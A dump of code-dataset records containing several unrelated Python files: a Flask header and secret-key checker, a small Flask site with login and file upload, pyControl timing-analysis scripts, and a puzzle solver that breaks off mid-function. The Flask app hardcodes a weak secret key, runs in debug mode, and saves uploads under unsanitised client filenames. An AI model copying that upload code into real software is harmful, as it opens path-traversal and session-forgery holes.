{"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 217, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 217, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 232, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 232, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 233, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 233, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 234, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 235, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 235, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 237, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 237, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 238, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 238, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 238, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 243, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 243, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 243, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 245, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 245, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 245, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 247, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 249, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 249, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 256, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 257, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 257, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 258, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 259, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 259, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 259, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 261, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 261, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 263, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 263, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 266, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 269, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 269, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 269, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 270, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 271, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 273, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 273, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 273, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 274, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 275, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 277, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 277, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 277, "usage_type": "attribute"}, {"api_name": "flask.request.json", "line_number": 278, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 278, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 279, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 280, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 280, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 281, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 281, "usage_type": "name"}]}
+{"seq_id": "630093723", "text": "from enum import Enum\r\nfrom .errors import *\r\nimport traceback\r\n\r\nclass RequestType(Enum):\r\n JSON = 1\r\n FORM = 2\r\n\r\n\r\ndef check_headers(request, secret_key, type):\r\n \r\n try:\r\n secret_key_to_check = request.headers['SECRETKEY']\r\n print(secret_key_to_check == secret_key)\r\n if secret_key_to_check == secret_key:\r\n print(request.headers['Content-Type']+'content')\r\n print(request.method)\r\n if request.method==\"GET\":\r\n return 200\r\n elif 'application/json' in request.headers['Content-Type'] and type.value==1 :\r\n return 200\r\n elif 'multipart/form-data' in request.headers['Content-Type'] and type.value==2 :\r\n return 200\r\n \r\n else:\r\n return 400\r\n except Exception as e:\r\n traceback.print_exc()\r\n return 403\r\n\r\n\r\ndef giveResponse(data,secret_key,request,request_type=RequestType.JSON):\r\n print(secret_key)\r\n # print(data)\r\n check_result = check_headers(request,secret_key,request_type)\r\n if check_result==200:\r\n return data\r\n else:\r\n if check_result==403:\r\n return error403\r\n elif check_result==400:\r\n return error400\r\n", "sub_path": "app/utils/checkheaders.py", "file_name": "checkheaders.py", "file_ext": "py", "file_size_in_byte": 1258, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "enum.Enum", "line_number": 5, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "555116193", "text": "from flask import Flask, render_template, Response, request, redirect, send_from_directory, url_for\nfrom data import User, Post, Student, Disciplines, session\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, SubmitField\nfrom flask_login import login_user, LoginManager, login_required, logout_user, current_user\nfrom werkzeug.utils import secure_filename\nimport os\n\n\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = 'gay'\nlogin_manager = LoginManager()\nlogin_manager.login_view ='login'\nlogin_manager.init_app(app)\nfile_path = '/home/vlados/kurs/files'\napp.config['UPLOAD_FOLDER'] = file_path\n\nclass LoginForm(FlaskForm):\n\tusername = StringField('username')\n\tpassword = PasswordField('password')\n\tsubmit = SubmitField('submit')\n\n\n\n@login_manager.unauthorized_handler\n@app.route('/login', methods = ['POST','GET'])\ndef login():\n\tform = LoginForm()\n\tif request.method == 'POST':\n\t\tx = session.query(User).filter(User.nickname == form.username.data).first()\n\t\tif(x and x.password_check(form.password.data)):\n\t\t\tlogin_user(x)\n\t\t\treturn redirect('title')\n\t\telse:\n\t\t\treturn redirect('login')\n\treturn render_template('authorization.html')\n\n@app.route('/')\n@app.route('/title')\ndef title():\n\treturn render_template('title.html',session = session, Post = Post, User = User, current_user = current_user)\n\n\n@app.route('/post', methods = ['POST','GET'])\n@login_required\ndef to_post():\n\tif request.method == 'POST':\n\t\tsession.add(Post(request.form['text'],current_user))\n\t\tsession.commit()\n\t\treturn redirect('title')\n\treturn render_template('post.html')\n\n\n@app.route('/materials')\n@login_required\ndef materials():\n\treturn render_template('usefull_things.html', session = session, Disciplines = Disciplines)\n\n\n@app.route('/materials/upload', methods = ['POST','GET'])\n@login_required\ndef materials_upload():\n\tif request.method =='POST':\n\t\tprint(request.files)\n\t\tf = request.files['filename']\n\t\tf.save(os.path.join(app.config['UPLOAD_FOLDER'],f.filename))\n\t\treturn \"file saved success\"\n\treturn render_template('upload.html')\n\n\n@app.route('/download/')\n@login_required\ndef download(filename):\n\treturn send_from_directory(app.config['UPLOAD_FOLDER'],filename)\n\n\n@app.route('/group_list',methods = ['GET'])\n@login_required\ndef group():\n\treturn render_template('group_list.html', session = session, Student = Student, current_user = current_user)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n\tlogout_user()\n\treturn redirect('login')\n\n\n@login_manager.user_loader\ndef load_user(id):\n\treturn session.query(User).filter(User.id == id).first()\n\napp.run(debug = True)\n", "sub_path": "file_main.py", "file_name": "file_main.py", "file_ext": "py", "file_size_in_byte": 2594, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 19, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 20, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "data.session.query", "line_number": 31, "usage_type": "call"}, {"api_name": "data.User", "line_number": 31, "usage_type": "argument"}, {"api_name": "data.session", "line_number": 31, "usage_type": "name"}, {"api_name": "data.User.nickname", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask_login.login_user", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 42, "usage_type": "call"}, {"api_name": "data.session", "line_number": 42, "usage_type": "name"}, {"api_name": "data.Post", "line_number": 42, "usage_type": "name"}, {"api_name": "data.User", "line_number": 42, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "data.session.add", "line_number": 49, "usage_type": "call"}, {"api_name": "data.session", "line_number": 49, "usage_type": "name"}, {"api_name": "data.Post", "line_number": 49, "usage_type": "call"}, {"api_name": "flask_login.current_user", "line_number": 49, "usage_type": "argument"}, {"api_name": "flask.request.form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "data.session.commit", "line_number": 50, "usage_type": "call"}, {"api_name": "data.session", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 52, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}, {"api_name": "data.session", "line_number": 58, "usage_type": "name"}, {"api_name": "data.Disciplines", "line_number": 58, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 69, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 75, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 81, "usage_type": "call"}, {"api_name": "data.session", "line_number": 81, "usage_type": "name"}, {"api_name": "data.Student", "line_number": 81, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 81, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 79, "usage_type": "name"}, {"api_name": "flask_login.logout_user", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 88, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 85, "usage_type": "name"}, {"api_name": "data.session.query", "line_number": 93, "usage_type": "call"}, {"api_name": "data.User", "line_number": 93, "usage_type": "argument"}, {"api_name": "data.session", "line_number": 93, "usage_type": "name"}, {"api_name": "data.User.id", "line_number": 93, "usage_type": "attribute"}]}
+{"seq_id": "497238009", "text": "'''\nAnalysis code for pyControl manuscript vaidation experiments.\n'''\n\nimport os\nimport numpy as np \nimport pylab as plt\n\nfrom scipy.io import loadmat\n\n# Plotting parameters.\nplt.rcParams['pdf.fonttype'] = 42\nplt.rc(\"axes.spines\", top=False, right=False)\n\n# -----------------------------------------------------------------------------\n# Generate figure\n# -----------------------------------------------------------------------------\n\ndef generate_figure():\n latency_analysis('low_load.mat' , fig_no=1 , title='low load')\n latency_analysis('high_load.mat', fig_no=2 , title='high load')\n timing_accuracy('low_load_10ms_pulses.mat' , fig_no=3, title='low load')\n timing_accuracy('high_load_10ms_pulses.mat', fig_no=4, title='high load')\n\n# -----------------------------------------------------------------------------\n# Latency analysis\n# -----------------------------------------------------------------------------\n\ndef latency_analysis(file_name, fig_no=1, title=''):\n '''Plot the distribution over all rising and falling edges of the\n latency between an input and output signals.'''\n\n # Import data.\n\n data_path = os.path.join('..', 'data', 'response latency', file_name)\n data = loadmat(data_path)\n\n # Calculate latencies.\n\n input_rising , input_falling = get_edge_times(data, 'B')\n output_rising, output_falling = get_edge_times(data, 'A')\n input_rising , input_falling = complete_pulses(input_rising, input_falling)\n output_rising, output_falling = complete_pulses(output_rising, output_falling)\n input_rising , input_falling, output_rising, output_falling = input_leads(\n input_rising , input_falling, output_rising, output_falling) \n\n rising_latencies = output_rising - input_rising\n falling_latencies = output_falling - input_falling\n\n all_latencies = np.hstack([rising_latencies, falling_latencies])\n\n # Plotting\n\n plt.figure(fig_no, clear=True, figsize=[3,3])\n bins = np.arange(np.min(all_latencies)-50, np.max(all_latencies)+50, 20)\n plt.hist(all_latencies , bins)\n plt.ylabel('# events')\n plt.xlabel('Latency (μs)')\n plt.title('Response latency ' + title)\n plt.tight_layout()\n\n print(f'Latency mean:{np.mean(all_latencies):.0f}, SD:{np.std(all_latencies):.0f}, '\n f'min:{np.min(all_latencies):.0f}, max:{np.max(all_latencies):.0f}')\n print(f'Fraction of edge latencies < 2ms: {np.mean(all_latencies<2000) :.4f}')\n\n# -----------------------------------------------------------------------------\n# Output timing accuracy\n# -----------------------------------------------------------------------------\n\ndef timing_accuracy(file_name, target_dur_ms=10, fig_no=1, title=''):\n '''Plot the distribution of discrepancies between the duration\n of high pulses in the signal and the target duration.'''\n\n # Import data.\n\n data_path = os.path.join('..', 'data', 'timing accuracy', file_name)\n data = loadmat(data_path)\n \n # Calculate pulse durations.\n\n rising_edges, falling_edges = get_edge_times(data, 'A')\n rising_edges, falling_edges = complete_pulses(rising_edges, falling_edges)\n \n pulse_durs = falling_edges - rising_edges\n dur_errors = pulse_durs-target_dur_ms*1000\n \n # Plotting\n\n plt.figure(fig_no, clear=True, figsize=[3,3])\n bins = np.arange(np.min(dur_errors)-50, np.max(dur_errors)+50, 20)\n plt.hist(dur_errors, bins)\n plt.ylabel('# events')\n plt.xlabel('Timing error (μs)')\n plt.title('Timing accuracy ' + title)\n plt.tight_layout()\n\n print(f'Error mean:{np.mean(dur_errors):.0f}, SD:{np.std(dur_errors):.0f}, '\n f'min:{np.min(dur_errors):.0f}, max:{np.max(dur_errors):.0f}')\n print(f'Fraction of errors < 1ms: {np.mean(dur_errors<1000) :.4f}')\n\n\n# -----------------------------------------------------------------------------\n# Maximum event rate analysis\n# -----------------------------------------------------------------------------\n\ndef missed_event_analysis(fig_no=1):\n '''For a set of data files each comprising an output signal following\n an input square wave at different frequencies, compute the fraction \n of input edges that are missed in the output signal an plot as a \n function of frequency.'''\n\n data_dir = os.path.join('..', 'data', 'maximum event rate')\n file_names = os.listdir(data_dir)\n file_event_rates = [int(file_name.split('Hz')[0])*2 for file_name in file_names]\n file_missed_proportions = [_missed_proportion(os.path.join(data_dir, file_name))\n for file_name in file_names]\n plt.figure(fig_no, figsize=[3,3], clear=True)\n plt.plot(file_event_rates, np.array(file_missed_proportions)*100, 'o')\n plt.xlabel('Continuous event rate (Hz)')\n plt.ylabel('Proportion of missed events (%)')\n plt.axhline(0, 0, color='k', linewidth=0.5)\n plt.xlim(0, 1000)\n plt.ylim(-0.5, 6)\n plt.tight_layout()\n\n\ndef _missed_proportion(data_path):\n '''Compute the proportion of events missed for one data file.'''\n\n # Import data.\n\n data = loadmat(data_path)\n\n # Find rising and falling edges.\n\n input_rising , input_falling = get_edge_times(data, 'B')\n output_rising, output_falling = get_edge_times(data, 'A')\n input_rising , input_falling = complete_pulses(input_rising, input_falling)\n output_rising, output_falling = complete_pulses(output_rising, output_falling)\n input_rising , input_falling, output_rising, output_falling = input_leads(\n input_rising , input_falling, output_rising, output_falling)\n\n # Proportion of events missed.\n\n n_input_events = len(input_rising) + len (input_falling)\n n_output_events = len(output_rising) + len (output_falling)\n p_missed = (n_input_events-n_output_events)/n_input_events\n return p_missed\n\n# -----------------------------------------------------------------------------\n# Utility functions\n# -----------------------------------------------------------------------------\n\ndef get_edge_times(data, channel):\n '''Return the times in us of rising and falling edges on the \n specified channel'''\n sampling_interval_us = data['Tinterval'].squeeze()*1e6\n signal = (data[channel].squeeze()>1).astype(int) # Signal converted to int 0/1 for low high.\n rising_edges = np.where(np.diff(signal)== 1)[0]*sampling_interval_us\n falling_edges = np.where(np.diff(signal)==-1)[0]*sampling_interval_us\n return rising_edges, falling_edges\n\ndef complete_pulses(rising_edges, falling_edges):\n '''Ensure first edge is rising and there are the same number of rising\n and falling edges.'''\n if rising_edges[0] > falling_edges[0]:\n falling_edges = falling_edges[1:] # Ensure first edge is rising.\n if len(rising_edges) > len(falling_edges):\n rising_edges = rising_edges[:len(falling_edges)] # Ensure same number of rising and falling edges.\n return rising_edges, falling_edges\n\ndef input_leads(input_rising , input_falling, output_rising, output_falling):\n '''Ensure the first input pulse occurs before the first output\n pulse and last output pulse follows last input pulse.'''\n if input_rising[0] > output_rising[0]: # Ensure first pulse is input.\n output_rising = output_rising[1:]\n output_falling = output_falling[1:]\n if input_rising[-1] > output_rising[-1]: # Ensure last pulse is output.\n input_rising = input_rising[:-1]\n input_falling = input_falling[:-1]\n return input_rising, input_falling, output_rising, output_falling\n", "sub_path": "framework performance validation/analysis code/validation_exp_analysis.py", "file_name": "validation_exp_analysis.py", "file_ext": "py", "file_size_in_byte": 7486, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pylab.rcParams", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pylab.rc", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scipy.io.loadmat", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 50, "usage_type": "call"}, {"api_name": "pylab.figure", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 55, "usage_type": "call"}, {"api_name": "pylab.hist", "line_number": 56, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 57, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 58, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 59, "usage_type": "call"}, {"api_name": "pylab.tight_layout", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "scipy.io.loadmat", "line_number": 77, "usage_type": "call"}, {"api_name": "pylab.figure", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 90, "usage_type": "call"}, {"api_name": "pylab.hist", "line_number": 91, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 92, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 93, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 94, "usage_type": "call"}, {"api_name": "pylab.tight_layout", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pylab.figure", "line_number": 117, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 119, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 120, "usage_type": "call"}, {"api_name": "pylab.axhline", "line_number": 121, "usage_type": "call"}, {"api_name": "pylab.xlim", "line_number": 122, "usage_type": "call"}, {"api_name": "pylab.ylim", "line_number": 123, "usage_type": "call"}, {"api_name": "pylab.tight_layout", "line_number": 124, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "231266970", "text": "import math, random, timeit, cv2, time, numpy as np\nfrom funcs import *\nfrom piece import pc\nnp.warnings.filterwarnings('ignore', category=np.VisibleDeprecationWarning)\n\nclass puzzle:\n def __init__(self, pcs, dims, startPiece=None):\n self.pcs = pcs\n assert dims[0]*dims[1]==len(pcs), f\"the given dimensions is not compatible with number of given pieces. len of array is {len(pcs)}\"\n self.unplaced = [e for e in pcs]\n self.placed = []\n self.dims = dims\n self.edgepcs = [e for e in self.pcs if sum(e.sideTypes==0) == 1]\n self.cornerpcs = [e for e in self.pcs if sum(e.sideTypes==0) == 2]\n self.solved = False\n self.maxX, self.maxY = 0, 0\n self.state = [[None]*dims[0] for i in range(dims[1])]\n\n if len(self.cornerpcs) > 0:\n s = self.cornerpcs[0] if startPiece==None else self.pcs[startPiece]\n r = [i for i in range(5) if s.sideTypes[i%4]==0 and s.sideTypes[(i+1)%4]==0]\n self.place(s, (0,0), r[0])\n\n self.cheat = [1, 3, 3, 3, 0, 0, 1, 0, 3, 2,\n 0, 1, 0, 3, 0, 0, 0, 1, 1, 3,\n 2, 0, 2, 2, 3, 2, 1, 2, 1, 3,\n 2, 2, 0, 0, 3, 1, 0, 0, 0, 1,\n 1, 1, 1, 2, 0, 0, 1, 2, 1, 0,\n 3, 2, 1, 2, 1, 1, 2, 0, 2, 3] \n\n def place(self, p, pos, r, keep=True, state=None):\n if type(p) == pc:\n p = [p]\n r = [r]\n pos = [pos]\n for i, pz in enumerate(p):\n pz.pos = pos[i]\n pz.rotation = r[i]\n assert not (keep and state!=None), \"cannot keep board state from hypothetical state input\"\n if keep and state==None:\n self.unplaced.remove(pz)\n self.placed.append(pz)\n self.solved = len(self.unplaced)==0\n self.maxX = pz.pos[0] if self.maxX 0:\n if prio:\n borders[4-m].append(pos)\n else:\n borders.append(pos)\n if prio:\n for i, e in enumerate(borders):\n if len(e) > 0:\n return 4-i, e\n return borders\n\n def bestPlacement(self, returnAll=False, maxPcs=3):\n numborder, spots = self.perimeterPositions()\n best = None\n if numborder == 1 and maxPcs >= 2:\n tspots = []\n dspots = self.canFit([(0,0),(1,0)], spots) + self.canFit([(0,0),(0,1)], spots)\n if maxPcs >= 3: tspots = self.canFit([(0,0),(1,0),(2,0)], spots) + self.canFit([(0,0),(0,1),(0,2)], spots)\n if len(dspots) > 0: spots = dspots\n if len(tspots) > 0: spots = tspots\n for spot in spots:\n pc, rot, score = self.bestFit(spot)\n if best==None or score < best[3]:\n best = (pc, spot, rot, score)\n if returnAll:\n return self.bestFit(best[1], returnAll=True)\n return best\n\n def canFit(self, shape, spots):\n assert (0,0) in shape, \"input shape must include (0, 0) and all relative positions to (0,0), if any\"\n can = []\n for spot in spots:\n relatives = {(spot[0]+p[0], spot[1]+p[1]) for p in shape}\n if relatives.issubset(set(spots)):\n can.append(list(relatives))\n return can\n\n def bestFit(self, pos, state=None, returnAll=False, scoreThreshold=25):\n sta = self.state if state==None else state\n best = None\n lol = []\n if type(pos[0]) == tuple and len(pos) == 1:\n pos = pos[0]\n if type(pos)==tuple:\n for pc in self.unplaced:\n for rot in range(4):\n score = self.evalPlacement(pc, pos, rot, state=sta)\n if best==None or score < best[2]:\n best = (pc, rot, score)\n if returnAll: lol.append((self.pcs.index(pc), pos, rot, score))\n else:\n for p in pos:\n assert type(p) == tuple, f\"position argument was not recognized as a tuple or list of tuples\"\n compatible = []\n total = 1\n for i in range(len(pos)):\n candidates, all = [], []\n noborders = len([1 for e in self.getBorders(pos[i]) if e != None]) == 0\n for r in range(4):\n for q in range(len(self.unplaced)):\n if not noborders:\n s = self.evalPlacement(self.unplaced[q], pos[i], r, state=sta)\n if s < scoreThreshold:\n candidates.append((self.unplaced[q], r))\n elif self.validEdgePlacement(self.unplaced[q], pos[i], r):\n all.append((self.unplaced[q], r))\n if len(candidates) == 0:\n candidates = all\n total *= len(candidates)\n compatible.append(candidates)\n dim = tuple(len(e) for e in compatible)\n print(f\"finding best for spots {pos}. search space is of dimensions {dim}: {total} possibilities\")\n for i in range(total):\n coord = np.unravel_index(i, dim)\n pzs, rs = [], []\n for j, e in enumerate(coord):\n pzs.append(compatible[j][e][0])\n rs.append(compatible[j][e][1])\n score = self.multiPlaceEval(pzs, pos, rs)\n if returnAll: lol.append(([self.pcs.index(e) for e in pzs], pos, rs, score))\n #print(f\"{coord}:{[self.pcs.index(x) for x in pzs]}, {rs}, score: {score}\")\n if best == None or score < best[2]:\n best = (pzs, rs, score)\n if returnAll:\n lol.sort(key=lambda x: -x[3])\n return lol\n #assert best[3] < 50, f\"No appropriate matches found for position/s {pos}. Best placement is {best}\"\n return best\n\n def multiPlaceEval(self, pzs, pos, rot, state=None, returnAll=False, scoreThreshold=25):\n assert len(pzs)==len(pos)==len(rot)>1, \"input lists are not of the same size, or are less than length 2\"\n fit = []\n st = state if state!=None else [[e for e in r] for r in self.state]\n for i, pc in enumerate(pzs):\n st = self.place(pc, pos[i], rot[i], state=st, keep=False)\n for i, pc in enumerate(pzs):\n f = self.evalPlacement(pc, pos[i], rot[i], state=st)\n if f>scoreThreshold: return 1e6\n fit.append(f)\n return sum(fit)/len(fit)\n\n def evalPlacement(self, p, pos, rot, state=None, show=False):\n sta = self.state if state==None else state\n borders = self.getBorders(pos, state=sta)\n scores = []\n ims = []\n for i, b in enumerate(borders):\n if b != None:\n o, s = b\n m = (rot-i+2)%4\n valid = self.validEdgePlacement(p, pos, rot)\n if valid:\n out = self.evalMatch((p, o), (m, s), show=show)\n if show:\n score, im = out\n scores.append(score)\n ims.append(im)\n else:\n scores.append(out)\n else:\n return 1e6\n assert len(scores) != 0, \"No match evaluation performed: 0 bordering edges.\"\n s = sum(scores)/len(scores)\n if show:\n t = np.array(ims[0], dtype=np.uint8)\n for i in range(1, len(ims)): \n st, sim = np.shape(t), np.shape(ims[i])\n diff = st[0] - sim[0]\n if diff > 0: ims[i] = np.pad(ims[i], ((0,diff),(0,0),(0,0)), \"constant\", constant_values=0)\n if diff < 0: t = np.pad(t, ((0,abs(diff)),(0,0),(0,0)), \"constant\", constant_values=0)\n t = np.concatenate((t, ims[i]), axis=1)\n return s, t\n return s\n\n def evalMatch(self, pieces, sidenums, ignoreRules=False, show=False, thickness=1, search=True):\n first, second = sidenums\n pc1, pc2 = pieces\n types1, types2 = pc1.sideTypes, pc2.sideTypes\n s1, s2 = pc1.correctedSides[first], pc2.correctedSides[second]\n validsides = True\n d = -1\n if (0 in types1) and (0 in types2):\n validsides = (types1[(first-1)%4]==0 and types2[(second+1)%4]==0) or (types1[(first+1)%4]==0 and types2[(second-1)%4]==0)\n elif (0 in types1) and (not 0 in types2):\n if sum(types1==0)==2:\n validsides = False\n else:\n i = np.where(types1==0)[0]\n validsides = not (first!=((i+2)%4))\n elif (not 0 in types1) and (0 in types2):\n if sum(types2==0)==2:\n validsides = False\n else:\n i = np.where(types2==0)[0]\n validsides = not (second!=((i+2)%4))\n elif pc1.sideTypes[first] == pc2.sideTypes[second] or (types1[first]==0) or (types2[second]==0):\n validsides = False\n else:\n d1, d2 = dist(s1[0], s1[-1]), dist(s2[0], s2[-1])\n d = abs(d1 - d2)\n validsides = d < 30\n validsides = validsides and not 